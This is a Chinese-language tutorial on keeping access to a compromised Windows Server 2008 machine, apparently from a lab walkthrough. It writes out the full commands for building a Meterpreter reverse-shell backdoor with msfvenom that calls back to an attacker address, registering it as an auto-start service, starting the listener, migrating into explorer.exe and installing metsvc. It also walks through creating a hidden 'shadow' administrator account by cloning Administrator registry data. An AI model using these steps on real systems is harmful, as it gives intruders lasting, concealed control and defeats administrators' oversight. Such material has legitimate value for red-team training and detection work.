Windows权限维持(二)

以下仅在自己虚拟机上进行测试

SC+MSF metsvc

在kali上生成一个test.exe后门文件

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.143 LPORT=1234 -f exe > ./test.exe

将test.exe文件放到win2008服务器上

在win2008上创建test服务

sc create test binPath= “C:\Users\Administrator\Desktop\test.exe ” start= auto

注意空格

在kali上启动MSF监听1234端口

use exploit/multi/handler

set paylaod windows/meterpreter/reverse_tcp

set LHOST 192.168.31.143

set LPORT 1234

exploit

回到win2008运行test服务

命令:sc start test

由于实验环境问题,此时kali可以收到shell,但是持续时间较短,需要进行进程迁移

kali创建会话后,使用ps命令查看进程

选择explorer进程进行迁移,记下explorer的PID为2264

使用migrate PID命令进行迁移

迁移后会话不会因为win2008的test服务启动失败而断开

建立服务自启动:

在kali上使用命令:run metsvc –A

此时在win2008已经启动了Meterpreter服务

影子账号

在win2008创建匿名用户

net user test$ test@123 /add

net localgroup administrators test$ /add

打开注册表,更改SAM权限

刷新

查看administrator对应的值

查看test$对应的值

复制0000001F4的中的F数据替换掉000003E8中的F数据

导出test$及其对应的二进制注册表

然后使用net user test$ /del 删除test$用户

最后双击导出的两个注册表,添加进注册表里面

注销当前账户,使用test$登录

使用net user查看,无test$用户信息